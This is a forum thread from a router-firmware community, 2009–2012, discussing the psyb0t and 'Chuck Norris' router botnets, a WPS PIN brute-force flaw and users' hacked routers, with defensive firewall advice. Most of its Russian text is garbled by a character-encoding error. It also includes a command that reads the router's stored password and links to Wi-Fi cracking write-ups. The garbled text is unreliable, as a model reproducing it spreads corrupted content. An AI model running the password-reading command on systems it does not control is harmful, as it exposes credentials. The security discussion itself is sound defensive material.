PDA

Bekijk de volledige versie : ¬нимание! Ѕезопасность Linux-based MIPSel роутеров!



ABATAPA
24-03-2009, 15:14
ѕо€вилась информаци€ о по€влении черв€, атакующего роутеры, DSL-модемы с архитектурой mipsel и под управлением Linux.

 ак его описывают тут (http://www.linux.org.ru/view-message.jsp?msgid=3583539):


* это Ч первый ботнетовый червь, поражающий роутеры и DSL-модемы;
* содержит шеллкод дл€ многих устройств на базе mipsel;
* не нацелен на ѕ  или серверы;
* использует множество техник, включа€ брутфорсовый подбор username:password;
* собирает пароли, передаваемые по сети;
* может сканировать сеть на предмет у€звимых серверов с phpMyAdmin и MySQL.

”€звимы Linux-устройства на базе mipsel, с открытым web-интерфейсом, telnetd или sshd в DMZ, со слабыми парол€ми.

 ак пишут на http://dronebl.org/blog/8:


You are only vulnerable if:

* Your device is a mipsel device.
* Your device has telnet, SSH or web-based interfaces available to the WAN
* Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.


¬ англо€зычной части форума уже проскакивало здесь (http://wl500g.info/showthread.php?t=19009).

”дел€йте внимание настройкам ваших маршрутизаторов, стойкости паролей, настройкам firewall, доступности вашего маршрутизатора извне!

¬ большинстве случаев зараженные роутеры "излечиваютс€" перезагрузкой.

Less
24-03-2009, 17:07
... настройкам firewall, доступности вашего маршрутизатора извне!

’отел бы € на него посмотреть :rolleyes:
ј то что много ботов ломитс€ на порты 22,23, 80, 443... так
iptables -I INPUT -i $WAN_IF .... -j LOG_DROP или просто DROP :D

ABATAPA
25-03-2009, 06:28
ј то что много ботов ломитс€ на порты 22,23, 80, 443... так
iptables -I INPUT -i $WAN_IF .... -j LOG_DROP или просто DROP :D

Ёто далеко не у всех так. » тем более не у всех закрыт доступ из MAN.

Ќу, вот и еще новости:


«лоумышленникам удалось доказать возможность создани€ рабочих ботнет сетей на платформах отличных от Windows, захватив управление над примерно 100 тыс€чами ADSL мини-маршрутизаторов и задействовав их в качестве единой ботнет сети дл€ проведени€ DDoS атак и рассылки спама.


»сточники:
http://www.opennet.ru/opennews/art.shtml?num=20918

http://www.eweek.com/c/a/Security/The-First-Linux-Botnet-626424/

al37919
25-03-2009, 06:42
ќсновной целью атаки €вл€ютс€ ADSL модемы Netcomm NB5, работающие под управлением Linux.

udhcpc.env представл€ет собой сжатый универсальный исполн€емый код (33  б), откомпилированный дл€ платформы MIPSel

ќднако, похоже, этот бот не угрожает конкретно нам, т.к. в этом случае его пришлось бы компилить с использованием тулчейна олео, или ќлега. »ћ’ќ любой бинарный код не запуститс€ на любом устройстве mipsel.

¬ общем, если держать наружу открытым только ssh, иметь нормальный пароль, а к остальным сервисам ходить через туннели, то можно спать спокойно. ƒл€ еще большего поко€ на ssh можно повесить bruteforce защиту с помощью ipt_recent

ј про то, что веб морду наружу не надо открывать вообще, а особенно с доступом admin/admin --- про это уже не раз говорено. “ут можно проблему и без ботов поиметь.

ABATAPA
25-03-2009, 07:34
ќднако, похоже, этот бот не угрожает конкретно нам, т.к. в этом случае его пришлось бы компилить с использованием тулчейна олео, или ќлега. »ћ’ќ любой бинарный код не запуститс€ на любом устройстве mipsel.

Ќе об€зательно.
Ќа любом - нет, на многих - запуститс€ статически слинкованный.




¬ общем, если держать наружу открытым только ssh, иметь нормальный пароль, а к остальным сервисам ходить через туннели, то можно спать спокойно.

“ак о том и речь, разве нет?



ј про то, что веб морду наружу не надо открывать вообще, а особенно с доступом admin/admin --- про это уже не раз говорено. “ут можно проблему и без ботов поиметь.

“о, что говорено где-то кем-то - ничего дл€ многих производителей (да и пользователей) не изменило.
ѕо-прежнему можно найти массу модемов с открытым управлением снаружи и парол€ми по умолчанию. „то и использовано тут.

SuxZ
25-03-2009, 09:02
¬ирусы теперь могут проникать в BIOS

 онец марта в этом году ознаменовалс€ двум€ важными новост€ми Ц во-первых, найден способ помещени€ вредоносного кода в пам€ть BIOS, а во-вторых, обнаружено массовое заражение домашних маршрутизаторов червем под названием Ђpsyb0tї, который превращает роутер в компонент ботнет-сети.



«аражение микросхемы BIOS в компьютере до сих пор считалось чем-то из области фантастики. »менно BIOS (Basic Input/Output System) отвечает за сохранение конфигурации системы в неизменном виде, а также за исполнение базовых функций ввода и вывода информации. “ем не менее, два аргентинских специалиста, јльфредо ќртега (Alfredo Ortega) и јнибал —акко (Anibal Sacco) из компании Core Security Technologies показали на конференции по информационной безопасности CanSecWest успешное введение в BIOS специальной программы дл€ удаленного управлени€, или руткита (rootkit). ¬ частности, им удалось на глазах зрителей заразить компьютеры с операционными системами Windows и OpenBSD, а также виртуальную машину OpenBSD на платформе VMware Player.

’от€ дл€ заражени€ BIOS по методу ќртеги и —акко необходимо заранее скомпрометировать машину или иметь физический доступ к машине, последстви€ такого заражени€ оказались просто ужасными Ц даже после полного стирани€ информации на жестком диске, перепрошивки BIOS и переустановки операционной системы при следующей перезагрузке машина вновь оказываетс€ заражена. ѕодробнее об атаке на BIOS можно прочитать в блоге ThreatPost.

≈ще одну серьезную опасность обнаружили администраторы сайта DroneBL, который занимаетс€ мониторингом IP-адресов, служащих источником различных сетевых атак. ѕримерно две недели назад на сайт была совершена DDoS-атака (Distributed Denial of Service Ц распределенна€ атака на отказ в обслуживании). ѕри расследовании инцидента вы€снилось, что атаку производили зараженные роутеры и DSL-модемы. ƒальнейший анализ показал, что в »нтернете по€вилась перва€ ботнет-сеть, котора€ базируетс€ не на ѕ  и серверах, а на сетевом оборудовании домашнего уровн€. Ёта вредоносна€ сеть вместе с червем, распростран€ющим заразу, получила название Ђpsyb0tї.

ћеханизм заражени€ Ђpsyb0tї оказалс€ довольно необычным. «аражению подвержены любые устройства с маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом, либо открывающие доступ через службы sshd или telnetd дл€ защищенной зоны DMZ, если у них заданы слабые сочетани€ имени пользовател€ и парол€ (включа€ устройства openwrt/dd-wrt). „ервь Ђpsyb0tї использует специальный алгоритм подбора имен пользовател€ и паролей, а также несколько стратегий дл€ перехвата управлени€ устройством.

ѕосле заражени€ червь Ђpsyb0tї встраивает фрагмент вредоносного кода в операционную систему устройства Ц в состав черв€ вход€т варианты кода дл€ нескольких версий системы Mipsel, они загружаютс€ с центрального сервера злоумышленников. «атем червь закрывает конечному пользователю доступ к устройству по telnet, sshd и через веб-интерфейс, а сам начинает исследовать все проход€щие через устройство пакеты, выужива€ из них различные имена и пароли. “акже червь пересылает своим владельцам информацию о наличии в локальной сети серверов с у€звимыми конфигураци€ми службы phpMyAdmin и —”Ѕƒ MySQL. ѕо данным DroneBL, уже сейчас в ботнет-сети насчитываетс€ более 100 тыс€ч активных зараженных устройств, используемых дл€ похищени€ частной информации и проведени€ крупномасштабных DDoS-атак. ќсобую опасность, по мнению первооткрывателей, представл€ет то, что большинство домашних пользователей, скорее всего, не смогут заметить присутстви€ черв€ Ђpsyb0tї в своей сети.

ѕодробное описание ботнета и черв€ Ђpsyb0tї можно найти в блоге DroneBL.

ѕо материалам zdnet.com и theregister.co.uk.

ќригинал статьи тут (http://soft.mail.ru/pressrl_page.php?id=33120)

¬опрос: с безопасностью наших Asus все в полном пор€дке?

Dao_Dezi
25-03-2009, 09:58
¬опрос: с безопасностью наших Asus все в полном пор€дке?

ќт хоз€ина јсуса зависит.  ак и в большинстве других случаев. ј вообще про это отдельный топ уже есть.

avk
25-03-2009, 10:06
ј вообще про это отдельный топ уже есть.

ѕеренес сюда.

tiny
25-03-2009, 22:08
Интересно, червь на bash написан?

Dao_Dezi
26-03-2009, 03:42
—уд€ по описанию - обычный ELF дл€ процессоров mips. ѕотому и не заражает обычные компы.

Omega
15-04-2009, 04:01
Ѕотнет атакует: червь дл€ Linux-based роутеров

¬ сети по€вилс€ новый червь Ђpsyb0tї, отличительными особенност€ми которого €вл€ютс€:
это - первый ботнетовый червь, поражающий маршрутизаторы (роутеры) и DSL-модемы;
содержит шеллкод дл€ многих устройств на базе операционной системы Linux Mipsel;
использует множество техник, включа€ брутфорсовый подбор username/password;
может сканировать сеть на предмет у€звимых серверов с phpMyAdmin и MySQL;
собирает пароли, передаваемые по сети;
не нацелен на ѕ  или серверы.
”€звимы Linux-устройства на базе Mipsel, с открытым web -
интерфейсом, telnetd или sshd в DMZ, со слабыми парол€ми.

http://www.linux.org.ru/view-message.jsp?msgid=3583539


¬ирусы теперь могут проникать в BIOS и роутеры !


 онец марта в этом году ознаменовалс€ двум€ важными новост€ми Ц во-первых, найден способ помещени€
вредоносного кода в пам€ть BIOS, а во-вторых, обнаружено массовое заражение домашних маршрутизаторов
червем под названием Ђpsyb0tї, который превращает роутер в компонент ботнет-сети.

≈ще одну серьезную опасность обнаружили администраторы сайта DroneBL, который занимаетс€ мониторингом
IP-адресов, служащих источником различных сетевых атак. ѕримерно две недели назад на сайт была совершена
DDoS-атака (Distributed Denial of Service Ц распределенна€ атака на отказ в обслуживании). ѕри расследовании
инцидента вы€снилось, что атаку производили зараженные роутеры и DSL-модемы. ƒальнейший анализ показал,
что в »нтернете по€вилась перва€ ботнет-сеть, котора€ базируетс€ не на ѕ  и серверах, а на сетевом оборудовании
домашнего уровн€. Ёта вредоносна€ сеть вместе с червем, распростран€ющим заразу, получила название Ђpsyb0tї.

ћеханизм заражени€ Ђpsyb0tї оказалс€ довольно необычным. «аражению подвержены любые устройства с
маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом,
либо открывающие доступ через службы sshd или telnetd дл€ защищенной зоны DMZ, если у них заданы слабые
сочетани€ имени пользовател€ и парол€ (включа€ устройства openwrt/dd-wrt). „ервь Ђpsyb0tї использует специальный
алгоритм подбора имен пользовател€ и паролей, а также несколько стратегий дл€ перехвата управлени€ устройством.

ѕосле заражени€ червь Ђpsyb0tї встраивает фрагмент вредоносного кода в операционную систему устройства
Ц в состав черв€ вход€т варианты кода дл€ нескольких версий системы Mipsel, они загружаютс€ с центрального
сервера злоумышленников. «атем червь закрывает конечному пользователю доступ к устройству по telnet, sshd
и через веб-интерфейс, а сам начинает исследовать все проход€щие через устройство пакеты, выужива€ из них
различные имена и пароли. “акже червь пересылает своим владельцам информацию о наличии в локальной сети
серверов с у€звимыми конфигураци€ми службы phpMyAdmin и —”Ѕƒ MySQL. ѕо данным DroneBL, уже сейчас в ботнет-
сети насчитываетс€ более 100 тыс€ч активных зараженных устройств, используемых дл€ похищени€ частной информации
и проведени€ крупномасштабных DDoS-атак. ќсобую опасность, по мнению первооткрывателей, представл€ет то, что
большинство домашних пользователей, скорее всего, не смогут заметить присутстви€ черв€ Ђpsyb0tї в своей сети.

ѕодробное описание ботнета и черв€ Ђpsyb0tї можно найти в блоге DroneBL (http://dronebl.org/blog/8).
ѕо материалам zdnet.com и theregister.co.uk.
»сточник: http://teh-podderzhka.3dn.ru/news/2009-03-25-23

ƒлинк уже собираетс€ вводить капчу ... :D

¬ирус psyb0t и pоутеры D-Link

¬ данный момент не было вы€влено заражени€ роутеров D-Link данным вирусом.

ƒл€ предотвращени€ заражением вирусом, следует прин€ть следующие меры:

ѕерезагрузить.
«адать сложный стойкий пароль 6-10 символов, желательно использовать спец. символы, кроме / \ ; * ? " | < >
ѕроверить устройство на открытый порт 23 вы можете тут: https://www.grc.com/x/portprobe=23
ѕроверить устройство на открытые порты вы можете тут: https://www.grc.com/x/ne.dll?bh0bkyd2
¬ будущем, веро€тно, по€в€тс€ вирусы, способные подбирать пароль, в св€зи с этим
планируетс€ введение подтверждени€ парол€ при помощи графической картинки.
http://forum.dlink.ru/viewtopic.php?t=89214

—коро напишут виры дл€ клавы и мыши ... :cool:

«.џ. ƒа, только сейчас заметил, что аналогична€ тема уже была ...
ѕопрошу уважаемых модераторов слить посты в тему ув. ABATAPA (http://wl500g.info/showthread.php?t=19014) :)

2 ABATAPA »скал, но не расширенным поиском ...
Ќужно ставить "Tags" дл€ быстрого поиска топиков ... ;)

midya
15-04-2009, 09:14
ѕохоже у Ќас заразилс€ один роутер сам про€вл€л сетевую активность за ночи нагнал трафика на 700 метров, это был D-link 320 со 2-ой прошивкой от lly перезагрузка почему-то не помогла, кнопка сброса не работала на сброс (правда € еЄ в рабочем состо€нии не провер€л может она и так не работает) пришлось сбросить через веб интерфейс и заново прописать то что там нужно по инструкции, сами виноваты пароль был элементарный 414 =((( Ќе ставьте простых паролей !!!

MrGalaxy
15-04-2009, 19:36
на ssh можно повесить bruteforce защиту с помощью ipt_recent
ѕодробнее про это, пожалуйста.

al37919
15-04-2009, 19:46
ѕодробнее про это, пожалуйста.
подробнее --- пожалуйста: кнопка ѕќ»—  наверху страницы. Ћибо ставьте 1.9.2.7-d --- там эта защита включаетс€ в вебе.

MrGalaxy
15-04-2009, 20:45
√оспода!
 то может рассказать про ipt_recent?
 ак его правильно ставить на роутер и как прописывать потом правила?

vectorm
15-04-2009, 21:06
√оспода!
 то может рассказать про ipt_recent?
 ак его правильно ставить на роутер и как прописывать потом правила?
http://www.opennet.ru/prog/info/2534.shtml - это ответ на 1 вопрос.

bagira
08-06-2009, 10:16
день добрый.
—кажите у мен€ прошивка последни€ официальна€...
я не нашла где отключить доступ по телнет и по SSH

это в каких мне настройках искать....

я провела тест роутера на порты
вот что получилось
22-23 stealthed
80 stealthed
21 closed

вроде бы все хорошо, но как мне 21 порт не закрыть , а просто сделать так же невидимым....

извините что задаю может глупые вопросы, но даже мне хочетс€ защититьс€ от заразы...

Dayran
09-06-2009, 15:50
а может кто-нибудь носом тыкнуть, где про настройки безопасности рассказываетс€? ѕоиском ничего конкретного не нашЄл.

wizeman
09-06-2009, 17:11
день добрый.
вроде бы все хорошо, но как мне 21 порт не закрыть , а просто сделать так же невидимым....


¬ настройках: USB Application - FTP Server - Enable FTP Server: Yes, LAN Only
’от€ в таком состо€нии он и должен быть закрытым.

ћожет на это вли€ет настройка: Enable Firewall?

bagira
09-06-2009, 17:24
¬ настройках: USB Application - FTP Server - Enable FTP Server: Yes, LAN Only
’от€ в таком состо€нии он и должен быть закрытым.

ћожет на это вли€ет настройка: Enable Firewall?



” мен€ официальна€ прошивка 1.9.7.7 , такой опции у мен€ нет FTP Server

USB Application - Basic Config

Enable Download Master? No
Enable Download Share? No
Default port range for Download Share: From To
Default Seed Time for BT(in hour):
Enable Media Server? no

DemonGloom
09-06-2009, 17:44
»ћ’ќ, светить Telnet наружу нельз€, а доступ по ssh разрешать только по максимальной длине ключа...
¬опрос знатокам: 1024 бита у нас максимум или можно больше?

Mr.Virtus
16-11-2009, 18:55
ƒобрый вечер.
ѕользуюсь данным маршрутизатором почти мес€ц и нареканий нет, но сейчас возникла необходимость установить на него некое приложение (бот дл€ контакта, который будет в сети совершать некую последовательность действий),
которое должно работать круглосуточно, даже при выключенном компьютере.
≈сли такое возможно, пожалуйста расскажите как реализовать это, заранее спасибо.

p.s. прошивка вроде последн€€, официальна€

ABATAPA
16-11-2009, 19:36
(бот дл€ контакта, который будет в сети совершать некую последовательность действий),


—памеры? "‘ермеры"? :)
≈сть perl, есть php.
ѕишите - и вперед.

vectorm
16-11-2009, 19:37
ƒобрый вечер.
ѕользуюсь данным маршрутизатором почти мес€ц и нареканий нет, но сейчас возникла необходимость установить на него некое приложение (бот дл€ контакта, который будет в сети совершать некую последовательность действий),
которое должно работать круглосуточно, даже при выключенном компьютере.
≈сли такое возможно, пожалуйста расскажите как реализовать это, заранее спасибо.

p.s. прошивка вроде последн€€, официальна€
— этой прошивкой можете о планах забыть.

Mr.Virtus
16-11-2009, 20:53
—памеры? "‘ермеры"? :)


скорее второе)



≈сть perl, есть php.

эмм.. не совсем пон€л что сие значит..



— этой прошивкой можете о планах забыть.

а какую нужно поставить чтобы реализовать свои планы? и как тогда себ€ дальше с ней вести?:confused:

Mashiro-sama
17-11-2009, 07:39
эмм.. не совсем пон€л что сие значит..

Ёто €зыки программировани€.  оторые можно поставить на роутер. —оответственно, пишете своего бота на perl, или php, или вообще на c++, и запускаете на роутере... Ќу или ищете в сети готового бота дл€ себ€ на php или perl, допиливаете при необходимости руками под роутер ;), и запускаете.

vectorm
17-11-2009, 10:31
а какую нужно поставить чтобы реализовать свои планы? и как тогда себ€ дальше с ней вести?:confused:
Ћюбую, из обсуждающихс€ здесь.
 ак вести - читать в прикрепленных темах и поиске ;)

Mr.Virtus
17-11-2009, 13:46
Ёто €зыки программировани€.  оторые можно поставить на роутер. —оответственно, пишете своего бота на perl, или php, или вообще на c++, и запускаете на роутере... Ќу или ищете в сети готового бота дл€ себ€ на php или perl, допиливаете при необходимости руками под роутер ;), и запускаете.

да, отлилный вариант, щас пойду только php вычу и сразу напишу (хоть € и знаю немного с++, но как бота на нЄм написать хз)



Ћюбую, из обсуждающихс€ здесь.
 ак вести - читать в прикрепленных темах и поиске ;)

супер, как всегда чЄткий, и грамотный ответ, а главное помогло то как

p.s. можно было даже лучше написать, например:
- читай форум, там всЄ есть
или
- юзай гугл

vectorm
17-11-2009, 14:17
сейчас возникла необходимость установить на него некое приложение (бот дл€ контакта, который будет в сети совершать некую последовательность действий)
јлаверды ;)
„еткий грамотный вопрос ;)

Ќапишите четкие требовани€, уточните на чем бот, это уже написанное ѕќ, или только планируемое, и т.п.

Omega
17-11-2009, 15:34
да, отлилный вариант, щас пойду только php вычу и сразу напишу
(хоть € и знаю немного с++, но как бота на нЄм написать хз)
супер, как всегда чЄткий, и грамотный ответ, а главное помогло то как
p.s. можно было даже лучше написать, например:
- читай форум, там всЄ есть
или
- юзай гугл
LOL :D ≈щЄ один кулхацкер ... :)
Ѕотоводство никаким боком не относитс€ к
приорететной специфике данного форума ... :cool:

«.џ. »дите на xakep.ru ... ;)

ABATAPA
19-11-2009, 12:47
д
супер, как всегда чЄткий, и грамотный ответ, а главное помогло то как



 аков вопрос - таков ответ. ћожно подумать, в ¬ашем вопросе была хоть толика конкретики.
ќтвет же содержал достаточную при начальных услови€х информацию. “о, что что-то не можете сделать ¬ы лично, не значит, что это вообще невозможно.

SancheSZ
03-12-2009, 21:45
ѕодниму тему...

ѕоходу взломали мой wl500gp v1 ...
ѕрошивка ќлега последн€€ (но не Ёнтузиастов)

Dec 1 01:03:22 passwd[16959]: password for `root' changed by user `root'
Dec 1 01:03:22 dropbear[16967]: password auth succeeded for 'root' from ::ffff:66.221.94.226:4489

ѕароль - 8 случайных букв в разном регистре, наружу открыт только ssh (телнет и веб-интерфейс наружу закрыты).

«аметил только сейчас, когда не смог залогинитьс€ по telnet\ssh
в веб-интерфейсе пароль осталс€.

ƒумаю, что ребут решит проблему с логином через телнет (passwd восстановитс€ из флеша).

P.S.: что интересно - перед сменой парол€ и успешным логином суд€ по логам не было попыток брутфорса (последн€€ попытка брутфорса - за сутки с лишним до взлома).
≈ще странно, что суд€ по логу сначала произошла смена парол€, а только потом - логин (т.е. это не брутфорс???)

Power
03-12-2009, 22:17
ѕароль - 8 случайных букв в разном регистре, наружу открыт только ssh (телнет и веб-интерфейс наружу закрыты).


¬ы абсолютно уверены, что веб-интерфейс наружу закрыт? ѕокажите вывод iptables-save.
≈сть ещЄ такие варианты: 1) у вас на компе вирус и он стырил пароль; 2) вы выложили файл с сохранЄнными настройками роутера на видное место.

SancheSZ
03-12-2009, 22:41
¬ы абсолютно уверены, что веб-интерфейс наружу закрыт? ѕокажите вывод iptables-save.
≈сть ещЄ такие варианты: 1) у вас на компе вирус и он стырил пароль; 2) вы выложили файл с сохранЄнными настройками роутера на видное место.

”верен. ” мен€ на 80 (соответственно и снаружи и изнутри) порту крутитс€ веб-морда дл€ торрента. ј веб-морда переведена на другой порт. ¬се порты (в т.ч. и этот другой) проброшены на мою внутреннюю машину (DMZ). —оответственно даже зна€ порт снаружи к веб-морде подключитьс€ нельз€.

P.S.: вообще брутфорс€т мен€ часто, но € как-то на это особо внимани€ не обращал (кроме пухнущих логов, которые на винт сбрасываютс€, - проблем никаких).
ƒа и щас брутфрос последний (окончившийс€ ничем был за сутки до этого и с других адресов)

AndreyUA
03-12-2009, 23:41
“оже была така€ же хренотеть как у SancheSZ. ќбратил внимание на то что не могу зайти по телнет и SSH «ашел на вебинтерфейс, в логах кусок кода какой-то страницы c JS и прочей лабудой. ѕодумал что глюк роутера и перепрошил его. ѕерезагрузка не помогала, т.к. € хранил в .files .passwd

vectorm
04-12-2009, 18:25
”верен. ” мен€ на 80 (соответственно и снаружи и изнутри) порту крутитс€ веб-морда дл€ торрента. ј веб-морда переведена на другой порт. ¬се порты (в т.ч. и этот другой) проброшены на мою внутреннюю машину (DMZ). —оответственно даже зна€ порт снаружи к веб-морде подключитьс€ нельз€.

P.S.: вообще брутфорс€т мен€ часто, но € как-то на это особо внимани€ не обращал (кроме пухнущих логов, которые на винт сбрасываютс€, - проблем никаких).
ƒа и щас брутфрос последний (окончившийс€ ничем был за сутки до этого и с других адресов)
„удес не бывает. —амба в локальную сеть не открыта?
ѕорт SSH 22 ? —менить не пробовали? ѕеревесив на любой порт выше 1024 ¬ы себ€ от головной боли избавите надолго. ’ацкеры в своем большинстве не умеют пользоватьс€ нормальными сканирующими утилитами.

vectorm
04-12-2009, 18:28
“оже была така€ же хренотеть как у SancheSZ. ќбратил внимание на то что не могу зайти по телнет и SSH «ашел на вебинтерфейс, в логах кусок кода какой-то страницы c JS и прочей лабудой. ѕодумал что глюк роутера и перепрошил его. ѕерезагрузка не помогала, т.к. € хранил в .files .passwd
ƒелаем бекап настроек заранее.
ј passwd можно попробовать через веб интерфейс удалить, через System command.

ABATAPA
23-02-2010, 21:33
»так, новый виток.

22.02.2010 20:32 ќбнаружен новый ботнет из незащищенных маршрутизаторов с прошивкой на базе Linux

„ешские исследователи в области безопасности компьютерных систем сообщили об обнаружении нового сетевого черв€, получившего название "„ак Ќоррис" и состо€щего из незащищенных надлежащим образом мини-маршрутизаторов, DSL-модемов и спутниковых TV-ресиверов, работающих на базе прошивок, основанных на Linux.  ак правило инфицирование маршрутизаторов происходит из-за выставлени€ администратором ненадежного парол€, подбираемого путем несложного перебора типовых вариантов, или сохранени€ парол€, заданного по умолчанию. “акже заражение может происходить через эксплуатацию обнаруженной в €нваре у€звимости в маршрутизаторах D-Link.

http://www.opennet.ru/opennews/art.shtml?num=25528

Omega
15-01-2012, 15:08
Ќова€ у€звимость в WPS позвол€ет быстрее угадывать PIN-код маршрутизатора

Ќедавно обнаруженна€ у€звимость в стандарте Wi-Fi Protected Setup (WPS) сокращает количество попыток, которые требуютс€ хакеру, пытающемус€ брутфорсить PIN-код процесса установки беспроводного роутера. ¬ результате ошибки слишком много информации о PIN-коде возвращаетс€ атакующему, а сам PIN-код становитс€ слабее, что негативно вли€ет на защиту миллионов Wi-Fi маршрутизаторов и точек доступа. »сследователь безопасности —тефан ¬ибок обнаружил эту у€звимость и доложил о ней в US-CERT.

ќт проблемы страдают продукты р€да производителей, включа€ D-Link, Netgear, Linksys и Buffalo. "я обнаружил несколько очень неудачных проектных решений, которые могут способствовать эффективной брутфорс атаке, наруша€, таким образом, безопасность буквально всех Wi-Fi маршрутизаторов с поддержкой WPS. ј поскольку большинство современных моделей поддерживают WPS по умолчанию, то пострадать могут миллионы устройств по всему миру", - сказал ¬ибок.

"ќдна попытка аутентификации занимает от 0.5 до 3 секунд. «амечено, что больше всего времени уходит на вычисление общего ключа ƒиффи Ц ’еллмана (это должно быть сделано перед генерацией M3). “ребуемое врем€ может быть сокращено за счет выбора очень малого секретного числа ƒиффи-’еллмана, в результате чего вырабатываетс€ небольшой публичный ключ, а вычислить общий ключ со стороны точки доступа становитс€ проще", - добавил он.

"≈сли проверка подлинности PIN-кода завершилась неудачно, точка доступа посылает сообщение EAP-NACK назад клиенту. Ёти сообщени€ пересылаютс€ таким образом, что хакеру удаетс€ определить, €вл€етс€ ли перва€ половина PIN-кода верной. ѕоследн€€ цифра уже известна, так как она €вл€етс€ контрольной суммой PIN-кода. ¬се это значительно сокращает количество попыток, требуемых дл€ успешного брутфорса PIN-кода.  оличество попыток сокращаетс€ со 108 до 103+104, что в сумме дает 11 000 попыток", - сказал консультант US-CERT.

¬ибок разработал инструмент Python дл€ брутфорса PIN-кодов. ќн его еще не выпустил, но сказал, что сделает это когда приведет в пор€док код. Ќи один из подверженных у€звимости производителей не выпустил исправлени€ или обходного пути дл€ бага, но в своей статье ¬ибок написал, что лучшим способом см€гчени€ на данный момент €вл€етс€ отключение WPS. “ак же способна помочь установка более длительного времени блокировки в результате многочисленных неудачных попыток аутентификации.

http://www.xakep.ru/post/58116/ :cool:

checat
24-01-2012, 17:54
Ќова€ у€звимость в WPS позвол€ет быстрее угадывать PIN-код маршрутизатора
ј как с этим обстоит дело в прошивке дл€ wl500gp v2? ј то € пару лет не обновл€л ничего, а тут вот прочитал про это.

Vampik
24-01-2012, 18:39
ј как с этим обстоит дело в прошивке дл€ wl500gp v2? ј то € пару лет не обновл€л ничего, а тут вот прочитал про это.

¬ прошивке от ќлега и энтузиастов вообще нет поддержки WPS, поэтому даже взламывать нечего ;)

Omega
08-04-2012, 14:51
Official Announcement: Avoiding Brute Force Attacks Via The WPS Protocol

Singapore (March 29, 2012)
For ASUS wireless and networking products, security is always the first priority.

In response to US CERT report on the vulnerability of the WPS protocol (http://www.kb.cert.org/vuls/id/723755), ASUS is now working
with the Wi-Fi Alliance to develop a firmware update capable of deterring and protecting from
such attacks. We will keep registered users informed as to the availability of this firmware
update, and will post it on our support site, as well.

To enhance security, most ASUS routers automatically disable WPS 2 minutes after setup.
Users can also manually disable WPS-PIN (the WPS push buttonwill still work) through router
setup to avoid possible concerns. Follow these steps to do so:

Launch your browser and enter 192.168.1.1 in the address bar. Then use admin
for both username and password to log-in to the router user interface.
Go to the Advanced Setup menu, and select Wireless Settings.
Under WPS settings, select OFF for Enable WPS. **
Click Apply to save settings.
** The Enable WPS button is available currently on RT-N66U only. More models
adopting Asus new firmware, Asus WRT, will also incorporate this function.

http://i146.photobucket.com/albums/r254/maylyn22/ASUS%20RT-N66U/ASUSRT-N66UAvoidingBruteForceAttacksViaTheWPSProtocol.png

http://www.campuselites.com/2012/03/29/official-announcement-in-response-to-us-certs-report-on-the-vulnerability-of-the-wps-protocol/ :cool:

pux
08-04-2012, 15:42
ќтцы, а нельз€ ли завести отдельную тему (или эту переименовать) и постить в нее только то, что св€зано с возможными проблемами с безопасностью на роутерах с данной прошивкой (+ софтом из основных репозитариев)? ” вас фактически полноценный дистрибутив, в нем куча кода, но как администраторам "коробочек" узнавать о проблемах с безопасностью? »ћ’ќ самое простое решение -- тема дл€ подписки, с минимальным трафиком.

TReX
08-04-2012, 23:16
ќтцы, а нельз€ ли завести отдельную тему (или эту переименовать) и постить в нее только то, что св€зано с возможными проблемами с безопасностью на роутерах с данной прошивкой (+ софтом из основных репозитариев)? ” вас фактически полноценный дистрибутив, в нем куча кода, но как администраторам "коробочек" узнавать о проблемах с безопасностью? »ћ’ќ самое простое решение -- тема дл€ подписки, с минимальным трафиком.

ј у нас есть проблемы с безопасностью? » нельз€ ли расшифровать пон€тие "администратор домашнего роутера" )

YuriM
15-05-2012, 16:06
ѕроцесс взлома описан здесь: http://habrahabr.ru/company/xakep/blog/143834/

Ќасколько мне известно, в оригинальной прошивке Asus wl500gpv2 есть включение/отключение WPS. ¬ олеговской не нашел. ќно вообще там работает?

vectorm
15-05-2012, 16:46
ѕроцесс взлома описан здесь: http://habrahabr.ru/company/xakep/blog/143834/

Ќасколько мне известно, в оригинальной прошивке Asus wl500gpv2 есть включение/отключение WPS. ¬ олеговской не нашел. ќно вообще там работает?
¬ прошивках ќлеги и Ёнтузиастов WPS нет как класса, соответственно, ломать нечего.
ѕоскольку обсуждать нечего - перенЄс сюда.

TReX
15-05-2012, 17:04
¬ прошивках ќлеги и Ёнтузиастов WPS нет как класса, соответственно, ломать нечего.
ѕоскольку обсуждать нечего - перенЄс сюда.

јјј можно немножко пофлудить?:cool: –аз уж подн€ли тут эту тему, то - ѕодбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того кака€ прошивка установленна на роутере) »спользуетс€ как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

ƒеклаймер - ≈стественно примен€етс€ только дл€ нахождени€ забытого парол€ к своей точке )

Pablo Escobar
15-05-2012, 18:49
коллеги, каюсь, помнил, но забыл.
как посмотреть/помен€ть пароль рута из веб-морды?

спасибо.

YuriM
15-05-2012, 21:55
¬ св€зи найденной у€звимостью в wps, хочу узнать, работает ли он в прошивке "от олега". ¬ оригинальной прошивке вроде есть и можно отключать.
–оутер asus wl500gpv2.

MercuryV
15-05-2012, 22:33
¬ прошивках ќлеги и Ёнтузиастов WPS нет как класса, соответственно, ломать нечего.
ѕоскольку обсуждать нечего - перенЄс сюда.
топикстартер этого не увидел и всЄ еще волнуетс€ (http://wl500g.info/showthread.php?19014-%C2%CD%C8%CC%C0%CD%C8%C5-%F7%E5%F0%E2%FC-%E4%EB%FF-Linux-based-mipsel-%F0%EE%F3%F2%E5%F0%EE%E2!&p=250493#post250493) :)

ABATAPA
16-05-2012, 11:09
ѕодбор паролей к WPA/WPA2 с использованием видеокарты http://habrahabr.ru/post/122553/ - естественно работает вне зависимости от того кака€ прошивка установленна на роутере) »спользуетс€ как обсчет на видеокарте так и сокращение необходимого диапазона просчета с использованием "как это по русски" - радужных таблиц )

“огда и € добавлю: взлом WPS (http://habrahabr.ru/company/xakep/blog/143834).

—юда же: "”головный кодекс –‘ (”  –‘). —тать€ 272. Ќеправомерный доступ к компьютерной информации. (http://www.consultant.ru/popular/ukrf/10_38.html#p4850)"


коллеги, каюсь, помнил, но забыл.
как посмотреть/помен€ть пароль рута из веб-морды?

 ак помен€ть из веб-морды? "System Setup" Ч> "Change Password"
»з консоли посмотреть:
nvram show | grep http_passwd

Visionary
01-08-2012, 18:40
